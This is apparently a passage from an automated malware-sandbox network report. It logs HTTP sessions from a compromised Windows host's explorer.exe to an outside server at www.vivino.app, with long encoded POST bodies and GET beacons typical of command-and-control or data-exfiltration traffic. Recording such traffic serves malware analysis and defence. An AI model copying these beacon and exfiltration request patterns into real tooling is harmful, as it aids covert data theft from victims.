                                                                                                              Data Raw: 30 48 51 4c 39 36 32 38 3d 78 2d 70 30 4b 58 7e 33 77 62 36 33 47 51 77 6c 67 36 69 35 79 6c 63 59 30 59 35 56 6a 68 62 76 55 6d 49 6b 53 77 71 5a 73 71 78 47 79 6f 4b 72 62 35 68 6b 61 78 67 79 37 35 76 77 51 4c 4d 47 79 39 35 73 59 53 72 35 6d 59 52 4c 62 66 73 52 38 44 73 33 6a 64 6c 7a 7a 47 4f 53 51 69 58 6f 28 71 73 31 64 61 77 30 74 4f 51 57 6f 62 54 62 61 55 4f 4b 48 6e 66 55 61 50 54 36 63 54 37 34 4f 5a 57 67 6f 38 51 63 4c 38 41 42 7a 71 46 63 49 4e 4a 49 72 72 72 31 7a 4c 36 52 76 66 42 67 49 67 74 51 47 38 46 76 30 65 46 35 7e 39 42 63 42 72 49 4a 4c 36 47 73 56 48 6f 65 57 4b 56 69 55 6f 57 44 76 58 34 45 46 66 71 68 42 79 6b 52 5a 50 4b 4c 6a 35 65 4b 4d 7a 62 55 70 77 47 52 28 5f 53 63 58 41 55 55 54 68 43 38 52 6b 56 2d 46 58 73 53 30 79 7a 70 36 59 30 6d 76 78 34 38 7e 39 4e 33 68 45 79 66 45 58 33 6c 6d 37 53 55 65 6c 6b 43 6f 67 76 41 71 52 5a 67 47 77 6b 62 47 6c 28 51 47 4b 55 70 75 44 4a 76 36 47 53 6e 7a 36 38 78 45 35 6b 49 79 71 39 74 71 43 50 61 72 42 7a 6c 51 41 4c 4c 4c 67 75 6e 6d 77 75 73 31 4b 59 57 4b 58 46 70 33 44 62 71 57 31 43 33 4d 38 78 48 7a 50 37 53 73 57 62 4a 30 7a 4d 7a 55 51 30 72 6d 61 31 4e 65 35 6a 37 63 65 41 4d 5a 35 33 54 75 75 56 4b 6f 46 74 69 70 56 28 47 4a 33 43 65 52 4b 37 6e 4f 38 6c 67 54 33 62 62 59 64 61 78 56 4e 61 42 75 36 63 4f 50 79 7e 35 47 5a 28 6e 46 39 74 42 33 38 33 6d 4a 67 58 69 31 6f 30 65 45 47 6a 37 37 68 4a 41 4b 39 66 69 38 36 4f 55 74 67 53 72 45 4f 69 78 47 4b 43 78 49 34 31 35 52 36 4d 41 41 6f 69 67 39 6d 4f 43 31 55 4f 6b 39 42 32 45 59 44 46 73 43 53 4c 48 56 36 58 69 42 31 52 47 51 44 4d 5a 48 75 72 4a 6a 31 6a 4d 57 45 67 65 65 42 58 6d 33 70 28 31 71 64 53 55 4a 76 4d 6a 54 6c 4f 78 33 6f 47 66 42 56 7a 7a 31 79 7a 55 53 6a 43 37 46 59 67 55 42 33 6d 33 51 4e 34 6c 54 73 5a 43 67 44 6c 50 6d 5a 32 45 76 6a 66 7a 37 39 55 44 34 68 75 4e 7a 54 75 6d 68 4e 6a 56 4f 67 55 54 6a 44 58 4f 38 66 59 77 4f 52 43 73 45 34 78 62 79 64 37 78 79 45 75 66 6c 55 4f 6c 4b 77 37 65 73 6c 4a 38 55 48 30 64 6a 31 64 58 64 2d 73 37 30 31 50 32 74 67 61 52 7e 36 35 74 49 79 57 4d 28 44 6d 7a 48 76 38 79 54 41 4c 54 57 31 34 4c 41 2d 70 33 49 72 38 61 31 76 59 71 48 31 69 6d 56 65 61 48 5a 37 4d 70 63 31 69 34 6e 4c 79 6b 31 36 36 46 69 63 61 44 6c 4b 67 62 43 43 36 4c 55 4e 4d 45 55 38 6d 32 34 54 4e 66 6c 32 4a 42 6b 4d 38 63 34 49 4e 49 57 58 74 5a 72 50 73 5a 39 47 73 7a 43 33 55 75 55 70 50 53 71 67 4e 6c 6b 70 55 64 72 67 43 7a 6e 41 36 65 32 76 31 34 46 41 78 44 42 62 79 6d 50 50 4b 6b 4d 35 64 6f 28 43 6b 76 45 42 7a 32 36 57 30 61 4b 6f 6c 4c 7e 62 64 5a 32 33 6d 76 35 30 39 51 4e 76 31 68 6a 45 35 34 4a 46 79 4a 48 32 50 67 4e 75 5a 77 35 6e 4c 4a 6d 64 30 54 4f 79 41 65 63 54 56 72 62 2d 6b 66 46 30 71 76 31 39 71 59 31 32 6c 53 74 70 52 4c 68 78 50 73 77 56 70 33 78 7a 79 45 66 39 32 79 44 62 67 41 57 37 65 37 43 62 31 6f 37 42 46 58 7e 42 4e 35 42 41 30 77 39 4c 69 7a 7a 4e 42 79 28 6d 58 39 51 35 7e 4a 6f 47 52 58 4a 4f 48 48 57 61 48 38 67 56 53 6b 75 2d 37 77 7a 35 39 66 79 6b 68 64 34 77 42 73 51 77 57 43 33 51 71 56 69 38 43 4e 57 63 62 75 63 5a 61 4f 74 78 67 35 51 59 66 58 65 49 5a 4b 4e 63 6f 2d 42 4a 71 38 33 5f 4e 53 34 6a 78 44 42 7a 73 79 34 49 7e 36 41 76 47 7a 50 4b 46 35 4a 47 4e 31 49 63 54 30 61 56 77 65 50 69 70 4c 59 50 76 4e 43 49 6c 47 55 4c 4d 52 33 58 52 39 53 53 71 57 6e 38 6a 69 59 6f 6b 4e 69 78 79 2d 30 33 33 68 41 6c 6c 33 48 45 49 68 6a 48 44 78 7e 65 47 69 51 37 62 41 52 71 45 70 68 73 44 44 66 67 4e 6e 43 5f 53 64 54 65 6e 4c 32 73 6d 70 57 31 6b 4b 41 6b 78 74 31 36 53 73 4a 77 7a 2d 43 62 4a 6f 68 74 6a 49 55 6b 28 51 55 44 61 51 65 70 72 57 72 67 64 33 4d 43 62 64 43 36 43 76 43 2d 4c 34 51 30 47 7a 47 68 37 72 39 6c 76 74 37 35 76 50 61 76 28 55 64 45 6f 47 34 61 56 55 76 49 5a 31 59 36 35 57 67 34 46 59 28 33 6e 4d 6c 48 71 4a 75 47 36 64 6e 6b 6f 70 6b 51 77 31 6a 79 51 41 4f 43 7e 73 79 56 6f 46 33 36 74 69 6f 67 4e 43 41 78 6a 45 6a 4f 49 61 32 4d 36 73 77 52 64 41 35 41 7a 4e 69 39 43 39 46 4e 7e 71 51 55 53 59 34 54 38 63 6c 30 31 4e 63 46 45 68 41 45 49 73 64 44 4c 63 61 47 37 38 30 6a 48 47 58 72
                                                                                                              Data Ascii: 0HQL9628=x-p0KX~3wb63GQwlg6i5ylcY0Y5VjhbvUmIkSwqZsqxGyoKrb5hkaxgy75vwQLMGy95sYSr5mYRLbfsR8Ds3jdlzzGOSQiXo(qs1daw0tOQWobTbaUOKHnfUaPT6cT74OZWgo8QcL8ABzqFcINJIrrr1zL6RvfBgIgtQG8Fv0eF5~9BcBrIJL6GsVHoeWKViUoWDvX4EFfqhBykRZPKLj5eKMzbUpwGR(_ScXAUUThC8RkV-FXsS0yzp6Y0mvx48~9N3hEyfEX3lm7SUelkCogvAqRZgGwkbGl(QGKUpuDJv6GSnz68xE5kIyq9tqCParBzlQALLLgunmwus1KYWKXFp3DbqW1C3M8xHzP7SsWbJ0zMzUQ0rma1Ne5j7ceAMZ53TuuVKoFtipV(GJ3CeRK7nO8lgT3bbYdaxVNaBu6cOPy~5GZ(nF9tB383mJgXi1o0eEGj77hJAK9fi86OUtgSrEOixGKCxI415R6MAAoig9mOC1UOk9B2EYDFsCSLHV6XiB1RGQDMZHurJj1jMWEgeeBXm3p(1qdSUJvMjTlOx3oGfBVzz1yzUSjC7FYgUB3m3QN4lTsZCgDlPmZ2Evjfz79UD4huNzTumhNjVOgUTjDXO8fYwORCsE4xbyd7xyEuflUOlKw7eslJ8UH0dj1dXd-s701P2tgaR~65tIyWM(DmzHv8yTALTW14LA-p3Ir8a1vYqH1imVeaHZ7Mpc1i4nLyk166FicaDlKgbCC6LUNMEU8m24TNfl2JBkM8c4INIWXtZrPsZ9GszC3UuUpPSqgNlkpUdrgCznA6e2v14FAxDBbymPPKkM5do(CkvEBz26W0aKolL~bdZ23mv509QNv1hjE54JFyJH2PgNuZw5nLJmd0TOyAecTVrb-kfF0qv19qY12lStpRLhxPswVp3xzyEf92yDbgAW7e7Cb1o7BFX~BN5BA0w9LizzNBy(mX9Q5~JoGRXJOHHWaH8gVSku-7wz59fykhd4wBsQwWC3QqVi8CNWcbucZaOtxg5QYfXeIZKNco-BJq83_NS4jxDBzsy4I~6AvGzPKF5JGN1IcT0aVwePipLYPvNCIlGULMR3XR9SSqWn8jiYokNixy-033hAll3HEIhjHDx~eGiQ7bARqEphsDDfgNnC_SdTenL2smpW1kKAkxt16SsJwz-CbJohtjIUk(QUDaQeprWrgd3MCbdC6CvC-L4Q0GzGh7r9lvt75vPav(UdEoG4aVUvIZ1Y65Wg4FY(3nMlHqJuG6dnkopkQw1jyQAOC~syVoF36tiogNCAxjEjOIa2M6swRdA5AzNi9C9FN~qQUSY4T8cl01NcFEhAEIsdDLcaG780jHGXrg4B5D8to96C3eYFdAkRfvry0J1~zIqKmwbRGHoP76DjUU8VDlW22n2F1rkqdjj(LoHsAvBfWfD(KVpJI8MdycaFl3Pyz6LrjeGV1z5BC0iFOGRi6Cy1zcBmKjX7OxDHapOszbs4LGT~CQP4gc2o0WGM4X3m1mwE7ZpBe06vMblO_(-(o8KYYHU(nsycnup1vCRImY2MF67Jl6lRXHTH1hfPcjLbE008AWLUv4bmU3fY2TfIwNtkdJ9amfiJgN96ZFEemIpzIft84Kiu6MyXC4FISlg7mq1OguthZ~X7Bc4i6iaVjXmS6Ar4rUoyCaKR2K8YKI8Kpq8gj85Hk(pT6qCv206U1cbqEXKO2pNCODfWCMFHTdn3XeDdgJcTIqRaBVjVuRRQEmEN5TsTfRwHXVziXxGE236j0Whjc4ZCEEyh-Q-uW8GLCcDhK7Zd-odG_N-9Tp6wRYIIPiJYZ(1BvY7~-QFMM83uBEibVxQvLlwJ2l6qP3wxOh_dN5ayndSEOyLw2iSq1~AsImnlZrpmy8x2Q9clmtEMk0S3BdPryzF5mTwSAnDmKiDYhTSGLZ7iJkeMxtC5EJ1H9(-Nurv7DyeCsJQgcW5SJMzVO9bDz5F4Zi4Gaa1jK9P5cJWqPLJ9557yQBDIAKpV_ygTPiEAEEBk6GXerolTiSdGum5G0~nAsUWfGF07G6T8cY-rbZcswqx~6SiMUIifkBjrUfxTUOe(BpR0klzzNRczB6ix5YM~-NVyf~BBdUIFqLmtV(dJr~w7QGrmVESy0jSjOzZUPVMdRn_Z0f6qPXleUgjZ55V45UmO2k5q027yghy6QrcAT3Pj38nFsdHD1gXCaPKQLzfmQDnr8tcyTmauBChRm45wcrL7orQFnNG0fKLo8H93iBpLsjk5
                                                                                                              Aug 22, 2022 20:06:56.217561007 CEST867OUTData Raw: 77 74 68 71 71 4f 59 7a 35 57 62 35 71 34 39 31 73 4e 41 34 42 76 6a 42 5a 37 43 32 5f 35 4a 49 5f 4f 56 73 69 61 74 70 72 4d 6f 78 34 41 4a 4d 6a 63 70 42 4f 76 4e 63 38 53 47 58 32 7e 74 37 6e 64 6e 4f 58 37 62 38 30 56 57 65 78 79 43 57 58 53
                                                                                                              Data Ascii: wthqqOYz5Wb5q491sNA4BvjBZ7C2_5JI_OVsiatprMox4AJMjcpBOvNc8SGX2~t7ndnOX7b80VWexyCWXSBe-coPI9kc8DoE3jpmM~msEYA4xqCBibyPOyY3IMg(Se8rUN3A8Qv1CHrHnsHrPdHZchbCZpwFS5K2raHgDXBDegkvWOQtSkGNgLCY5c3tfCCyKm0rF~sTHktVZI7XherwUJ6d5iMYHIoGyRQfkZVgRNtPov0OslB
                                                                                                              Aug 22, 2022 20:06:56.228319883 CEST870OUTData Raw: 42 43 41 36 39 45 46 4b 6b 5a 33 76 4c 6a 67 4d 57 6f 54 7a 64 45 36 71 51 47 33 63 57 38 69 4d 5a 4a 5f 55 72 62 61 7a 42 42 4e 49 71 30 72 4e 56 57 61 31 59 41 7a 7a 56 76 31 77 38 47 79 36 4c 4d 6e 6d 6e 7e 67 4f 36 61 7a 6a 54 7a 48 78 72 68
                                                                                                              Data Ascii: BCA69EFKkZ3vLjgMWoTzdE6qQG3cW8iMZJ_UrbazBBNIq0rNVWa1YAzzVv1w8Gy6LMnmn~gO6azjTzHxrhTLw7Ky0XROePznwel1dlWV5auRSq_tXT6N4vJaAFOg-SQ8M4vAf1_8x3QTMP3eJfPKlVnESS1L7T2m9si6CHNcdfD6K65XfJyXU~-KTsaC5GWXVhco4jK~uhDEXY7cpKQfj7uRKf4Pa(pkObeYzVGHO5wjcCRfa4k
                                                                                                              Aug 22, 2022 20:06:56.228437901 CEST874OUTData Raw: 66 7e 53 63 5a 54 69 4c 54 49 75 72 50 68 55 7e 5a 6d 43 53 50 44 72 35 68 76 67 30 47 67 71 55 32 31 4a 55 35 6b 5f 42 59 68 5a 4c 61 43 57 48 64 57 39 73 65 6d 32 48 61 49 63 73 74 33 57 74 75 79 56 78 61 64 4f 6e 54 6c 4e 72 35 31 44 71 6b 53
                                                                                                              Data Ascii: f~ScZTiLTIurPhU~ZmCSPDr5hvg0GgqU21JU5k_BYhZLaCWHdW9sem2HaIcst3WtuyVxadOnTlNr51DqkS8Es1OCVQ78YH_1Lt7BSwE2mSTFA(e~zLzOdqpX8bhcubXw65iZJ2OYxTpvSnGFb91Jr58GcLTEXuwz5wCW6RrmZdztNs-EayhJ2TH9at5WYZSEqv1oKnMuU0BwIvkEZQYPDv_(geRSPdAIinLMypU0hTmPKs_~a(x
                                                                                                              Aug 22, 2022 20:06:56.228627920 CEST878OUTData Raw: 32 51 35 39 67 69 51 61 6c 70 78 31 46 6d 5f 69 72 39 33 38 32 73 6c 69 72 79 5f 47 70 52 50 37 54 37 71 44 5a 58 5f 41 6b 63 55 61 6d 56 74 64 71 49 5f 33 49 43 44 6c 44 35 6f 71 35 73 71 57 4b 6c 30 33 54 53 6e 70 4a 70 68 65 36 46 79 66 7a 58
                                                                                                              Data Ascii: 2Q59giQalpx1Fm_ir9382sliry_GpRP7T7qDZX_AkcUamVtdqI_3ICDlD5oq5sqWKl03TSnpJphe6FyfzXIhklB6FD2HXQKn63zvOaYKRD4vpoMKEaHbDVhBgk_bKBtkz5R78YUcHjBUKYp2_YlC-RzM1eplsVtef2A8orbasOtNi2piWAgFZcM9hcjyS8HsOqSbKHceQj41SKEZ-hDQEiuyH8XfIYvQToQbNd7P8HYTbuISR7t
                                                                                                              Aug 22, 2022 20:06:56.228974104 CEST892OUTData Raw: 55 4f 58 70 68 6f 56 48 62 32 4d 7a 55 42 36 7a 52 67 7a 67 45 73 51 5a 71 79 51 55 31 56 63 72 54 56 36 43 57 55 5f 7a 6e 78 64 37 64 50 79 38 46 37 42 6f 6b 34 59 47 72 72 53 57 30 6c 68 34 56 65 31 5a 32 70 49 63 56 52 4a 37 43 6b 37 45 67 28
                                                                                                              Data Ascii: UOXphoVHb2MzUB6zRgzgEsQZqyQU1VcrTV6CWU_znxd7dPy8F7Bok4YGrrSW0lh4Ve1Z2pIcVRJ7Ck7Eg(9WTCgkSCWHU0rH4OCbDPZwBfziPbfCAIVleyUniwXhtN6ZnI-mDqzFimI6pc9SumsAMYzWmw5UJShc2Zomy51aRV4h6fmzLZd44Frs76SK484hltp~dXTAFIcPRbT7y8JScJcflgEdfNVLjlaPaL6tdP8~Ik6UhUe
                                                                                                              Aug 22, 2022 20:06:56.229140997 CEST894OUTData Raw: 5a 36 4e 54 68 31 49 59 79 43 54 48 5f 38 57 69 66 7a 54 56 53 54 71 6f 34 65 78 33 52 65 6b 41 64 47 73 50 7a 4c 39 33 39 51 6b 76 69 62 4d 6f 4c 35 42 46 52 5a 5a 30 4a 30 6c 28 55 68 47 74 56 55 6c 38 61 62 5f 56 34 69 36 34 47 65 56 76 74 56
                                                                                                              Data Ascii: Z6NTh1IYyCTH_8WifzTVSTqo4ex3RekAdGsPzL939QkvibMoL5BFRZZ0J0l(UhGtVUl8ab_V4i64GeVvtVeWrDMHbUq6NqXC0Fnnq2MKiZcej77kU7JH9eNLEYhHTJ_0As-CtlQ0tYYT7iaGwcXtLQ34dt5jDUxAeCrUm53ZtmRQOi2Mmr9cmowKvtc7_fk2df4eRYDlXSwbDE8(47bRx4AtwgDKsSKJw7bTSdPnAJ8kCCQs_2k
                                                                                                              Aug 22, 2022 20:06:56.229275942 CEST894INHTTP/1.1 403 Forbidden
                                                                                                              date: Mon, 22 Aug 2022 18:06:56 GMT
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              vary: Accept-Encoding
                                                                                                              server: NginX
                                                                                                              content-encoding: gzip
                                                                                                              connection: close
                                                                                                              Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              11192.168.11.204979745.77.55.16180C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:07:16.415553093 CEST896OUTGET /oe07/?lP=z6AX5nfHP&0HQL9628=d5su3Z4iOwMZnhaJlYvQjVnFWUJeY1xeLTB2izYPxxrSUwfZ7XCIsMdyeMGBiIZ8vgNU HTTP/1.1
                                                                                                              Host: www.vivino.app
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Aug 22, 2022 20:07:16.427056074 CEST896INHTTP/1.1 302 Found
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Location: https://dan.com/buy-domain/vivino.app
                                                                                                              Date: Mon, 22 Aug 2022 18:07:16 GMT
                                                                                                              Content-Length: 60
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 6e 2e 63 6f 6d 2f 62 75 79 2d 64 6f 6d 61 69 6e 2f 76 69 76 69 6e 6f 2e 61 70 70 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                              Data Ascii: <a href="https://dan.com/buy-domain/vivino.app">Found</a>.


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              12192.168.11.204979845.77.55.16180C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:07:18.451040030 CEST899OUTPOST /oe07/ HTTP/1.1
                                                                                                              Host: www.vivino.app
                                                                                                              Connection: close
                                                                                                              Content-Length: 245786
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.vivino.app
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.vivino.app/oe07/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 30 48 51 4c 39 36 32 38 3d 56 62 67 55 70 38 42 52 66 30 42 72 69 78 36 6a 6d 38 69 7a 35 67 33 36 55 57 5a 57 57 57 70 41 58 44 55 4a 7e 44 6f 6d 36 55 66 79 64 45 58 45 32 6c 54 71 67 49 41 2d 44 50 6a 70 38 63 68 36 78 52 34 62 55 42 39 65 54 51 74 5f 62 69 64 4f 39 53 4b 35 76 38 68 38 7a 63 4e 6a 55 53 35 55 58 44 42 5f 4c 79 30 57 76 41 7a 4f 4d 67 47 75 43 78 4a 72 75 75 32 61 52 54 6d 55 5a 6a 36 62 75 6d 42 77 72 5a 46 65 38 4c 34 75 61 45 52 78 53 4f 65 47 71 58 68 6f 28 62 34 6a 44 66 7e 51 4d 54 63 70 6b 72 45 4f 32 68 65 53 4e 59 4c 64 49 50 56 41 75 6e 57 6f 6a 36 46 2d 63 6d 32 4f 4b 39 7a 6a 41 59 4b 54 74 54 49 7a 6e 65 61 55 54 62 58 46 48 74 53 6d 68 74 31 34 46 6c 71 62 67 47 46 65 4d 51 48 6f 73 41 67 62 51 6a 43 76 42 46 67 4e 79 66 36 36 75 62 39 39 48 73 79 44 57 48 56 74 48 36 56 73 55 51 69 65 70 78 65 70 47 4c 28 45 5a 33 76 35 32 48 73 58 66 61 31 4f 53 51 6a 45 5a 70 38 5a 43 6d 38 49 64 50 41 47 41 70 63 67 33 46 61 4f 62 52 73 46 38 4c 76 34 71 6e 30 70 67 4b 48 58 78 48 61 43 6c 77 6a 33 34 47 76 33 7e 4d 39 5f 56 41 78 76 4d 4d 55 6f 78 76 45 63 49 42 6b 70 43 62 6b 38 79 6c 36 42 54 5f 48 4e 76 36 52 38 63 4a 32 71 79 37 5a 70 7a 41 4e 58 30 50 28 68 52 6d 28 30 46 77 4d 6f 55 64 4e 59 6c 68 77 6b 59 39 71 6f 79 72 33 32 54 79 4a 48 79 6a 76 45 75 47 70 36 47 7a 69 62 70 43 64 69 53 77 67 4c 55 78 53 35 49 6b 76 65 50 58 43 2d 34 63 6d 6a 33 30 35 51 33 76 4a 49 44 4a 66 52 47 5a 79 76 55 44 61 61 55 6c 68 74 39 52 34 59 35 76 50 5a 6b 4a 43 49 67 31 4b 6b 6e 72 45 51 42 6d 4b 6d 70 47 56 6c 73 54 65 6d 42 45 39 6a 57 64 7e 68 35 2d 54 75 46 61 4f 79 51 33 56 51 35 44 68 4a 50 7a 67 66 63 44 58 51 67 51 58 64 46 78 6e 67 59 52 49 66 58 46 72 56 56 58 79 41 57 39 7e 46 33 53 64 58 70 41 28 77 62 57 50 48 66 43 6f 7a 66 7a 59 65 28 6e 37 7a 67 59 68 4f 7e 74 6e 44 4e 54 37 42 34 43 58 6c 54 5f 6a 43 72 70 79 75 42 4c 31 6b 73 64 47 39 35 6f 52 57 30 54 59 51 72 37 76 53 71 36 5a 62 76 63 28 35 5a 68 50 6f 56 37 4f 4f 4c 39 74 70 66 55 6a 56 30 36 45 32 4e 70 48 35 6c 43 43 59 76 77 46 50 39 66 59 31 54 65 55 70 78 6b 63 32 4f 61 36 33 61 54 52 53 6d 5a 55 79 59 6a 76 4b 45 77 6d 54 28 65 52 46 4b 38 59 63 37 30 6d 67 67 73 36 4e 6b 59 33 68 4d 5a 41 4f 74 43 50 70 59 58 67 64 31 45 5a 77 39 45 46 58 4d 58 36 53 72 6f 32 6a 78 58 66 4c 6b 48 79 32 59 38 4e 34 62 66 45 75 70 74 35 68 4d 65 55 47 4e 73 6e 36 55 37 7e 5a 67 6e 58 47 6b 51 48 4d 6a 37 53 41 34 76 67 6a 71 32 57 4a 46 52 54 6c 57 49 47 41 44 6e 4e 58 64 6c 35 4b 56 46 4c 6c 37 64 65 76 70 52 6b 6d 59 56 7e 77 39 71 49 6d 65 52 30 62 62 53 71 6e 78 50 59 68 7a 34 58 58 6d 4d 4d 64 66 51 37 78 57 48 53 6f 65 4a 63 6d 56 63 6e 53 56 6e 53 57 75 75 55 5a 56 61 70 67 56 4a 76 32 4c 30 39 61 34 78 44 71 76 44 41 6a 73 4d 78 2d 4a 35 54 5a 49 6f 61 4a 6a 62 77 62 31 6a 68 78 75 68 73 5a 32 33 5a 5a 45 50 67 56 6b 46 33 62 6c 49 68 78 45 4c 65 35 6e 48 53 45 7a 42 72 66 74 6f 6c 77 49 77 75 57 51 73 4e 39 6e 50 56 62 35 5f 33 6d 6e 4d 30 55 62 6f 33 77 6f 65 36 56 30 4b 39 34 39 6a 41 73 4d 51 7e 6f 30 56 49 46 6f 4d 34 79 75 58 6b 4f 44 51 4c 35 70 64 70 61 39 76 36 44 53 7a 70 42 57 52 54 42 55 4c 63 57 31 4d 50 66 64 44 61 4b 76 67 28 4c 37 78 57 62 63 46 63 68 79 49 59 46 33 63 52 70 30 6b 59 6d 64 4a 6e 33 6c 6f 56 4f 75 30 30 45 28 61 63 57 52 65 35 56 47 59 6a 50 64 42 77 58 69 4c 4f 43 65 74 35 2d 4e 73 49 72 69 4c 55 4a 54 47 37 66 6c 71 50 51 77 77 64 4e 37 56 6b 44 4d 70 53 57 69 4d 56 71 72 43 4e 72 70 65 48 70 42 48 38 49 49 4b 79 74 6b 55 7e 48 6c 50 49 66 4b 53 5a 63 6c 51 54 32 65 45 6e 73 6e 63 52 67 4c 38 6b 74 4d 74 44 45 4d 5f 7e 4d 65 50 7e 6f 61 53 76 48 68 70 6e 79 79 37 46 4f 72 61 72 79 62 6d 4f 47 49 75 57 69 78 42 37 45 4b 63 77 36 4f 66 49 33 33 74 53 37 59 66 31 75 50 51 44 30 50 45 33 79 56 47 65 64 65 55 4c 6b 50 73 6c 79 36 39 5a 41 43 67 63 58 66 74 59 6a 34 31 6f 73 51 6c 67 48 46 30 36 52 6e 30 44 6d 39 62 49 64 6c 6b 73 43 64 43 73 34 65 64 34 72 5a 76 4d 62 56 2d 67 52 30 36 39 64 68 54 77 63 6f 68 48 66 35 58 61 52 59 36 5a 4f 57 53 70 77 6e 36 7a 77 63 64 7e 4c 66 59 6c 41 53 48 34 68 61 48
                                                                                                              Data Ascii: 0HQL9628=VbgUp8BRf0Brix6jm8iz5g36UWZWWWpAXDUJ~Dom6UfydEXE2lTqgIA-DPjp8ch6xR4bUB9eTQt_bidO9SK5v8h8zcNjUS5UXDB_Ly0WvAzOMgGuCxJruu2aRTmUZj6bumBwrZFe8L4uaERxSOeGqXho(b4jDf~QMTcpkrEO2heSNYLdIPVAunWoj6F-cm2OK9zjAYKTtTIzneaUTbXFHtSmht14FlqbgGFeMQHosAgbQjCvBFgNyf66ub99HsyDWHVtH6VsUQiepxepGL(EZ3v52HsXfa1OSQjEZp8ZCm8IdPAGApcg3FaObRsF8Lv4qn0pgKHXxHaClwj34Gv3~M9_VAxvMMUoxvEcIBkpCbk8yl6BT_HNv6R8cJ2qy7ZpzANX0P(hRm(0FwMoUdNYlhwkY9qoyr32TyJHyjvEuGp6GzibpCdiSwgLUxS5IkvePXC-4cmj305Q3vJIDJfRGZyvUDaaUlht9R4Y5vPZkJCIg1KknrEQBmKmpGVlsTemBE9jWd~h5-TuFaOyQ3VQ5DhJPzgfcDXQgQXdFxngYRIfXFrVVXyAW9~F3SdXpA(wbWPHfCozfzYe(n7zgYhO~tnDNT7B4CXlT_jCrpyuBL1ksdG95oRW0TYQr7vSq6Zbvc(5ZhPoV7OOL9tpfUjV06E2NpH5lCCYvwFP9fY1TeUpxkc2Oa63aTRSmZUyYjvKEwmT(eRFK8Yc70mggs6NkY3hMZAOtCPpYXgd1EZw9EFXMX6Sro2jxXfLkHy2Y8N4bfEupt5hMeUGNsn6U7~ZgnXGkQHMj7SA4vgjq2WJFRTlWIGADnNXdl5KVFLl7devpRkmYV~w9qImeR0bbSqnxPYhz4XXmMMdfQ7xWHSoeJcmVcnSVnSWuuUZVapgVJv2L09a4xDqvDAjsMx-J5TZIoaJjbwb1jhxuhsZ23ZZEPgVkF3blIhxELe5nHSEzBrftolwIwuWQsN9nPVb5_3mnM0Ubo3woe6V0K949jAsMQ~o0VIFoM4yuXkODQL5pdpa9v6DSzpBWRTBULcW1MPfdDaKvg(L7xWbcFchyIYF3cRp0kYmdJn3loVOu00E(acWRe5VGYjPdBwXiLOCet5-NsIriLUJTG7flqPQwwdN7VkDMpSWiMVqrCNrpeHpBH8IIKytkU~HlPIfKSZclQT2eEnsncRgL8ktMtDEM_~MeP~oaSvHhpnyy7FOrarybmOGIuWixB7EKcw6OfI33tS7Yf1uPQD0PE3yVGedeULkPsly69ZACgcXftYj41osQlgHF06Rn0Dm9bIdlksCdCs4ed4rZvMbV-gR069dhTwcohHf5XaRY6ZOWSpwn6zwcd~LfYlASH4haHePjK5kFIGurd~MQnAVKgXT(FpstKnvZYwZz4hiHSUg6oR6d2XuU95WEUScQqe5JX9x10teyi9NaUhrsAjIND6bk6puw8X5J_VZH-n_(QgFBVRmckSkytK1X8V594iOMMw-yvOidnTDehALPPzteG8LIrX2fPVtaz8Omk3PEEH-UKsuyn3zpx0Fvq6iFh(vsCeunD7LrdK0mqPPr44vLJcsLdkDg-GngTKf8B4MleDfrd8QJoJgWuNsVlFEDjm2cLpv9W81PcWICQVGWPuzAjcOxtqYX-3-vuGU5uek4DS_jKdDZh5gx1~q~FBHG2grf_rxc5W-zS9StQv2yhb_8240kSwjwrU28wEoUkXWbTTt6p95m_DnnxT6oHlaRRu4h952OK0oE5aG4jvvO0RZj3nFKrGRQrcX048lK-u91U3Cfg7VESZtZAPDUYLRqHyjnQEEa9(vW4G1UpOtMT5P3_dE(lm36EjPIYpKp5M5zt45c-~u0t6RY8sXL-hmNghoO0WQMurIbdWT8BWsrnUAHQSWD7tTI_wsOlhq5lFNONp2iKim1vbWweS8wX2r~JqxPzjqOJFJi5n8ajRhFqTjteVuXJPlqBIkUFSGprKL4la4VH6zzmuTK615VGYs8q5ZmqzmcN3BVnR9FUzfsyItsI(-VTUMXNWzlBr0mTTWJwKDUEoXZliIlgWCKsRcuzpjEtoiCfb8DEYt08MgVOI4zPYu9mnWZNWcm8iWPhIJoD1QsNxDtrE6QMfSJNtHreIwmohU2e645zISwttHXftVPrzkjt1KKixP9sNwvp7u~r65oxcmefWQAhobM3A3KNUF4aVWG_nCk3CJ(gxP25PH3cdoO7eCt7bmk00Gz7(oo6t28ls9Io7BiuJIfoYoxUOV80w-UvmDND4HGkpk5bw1pcDrvFff12
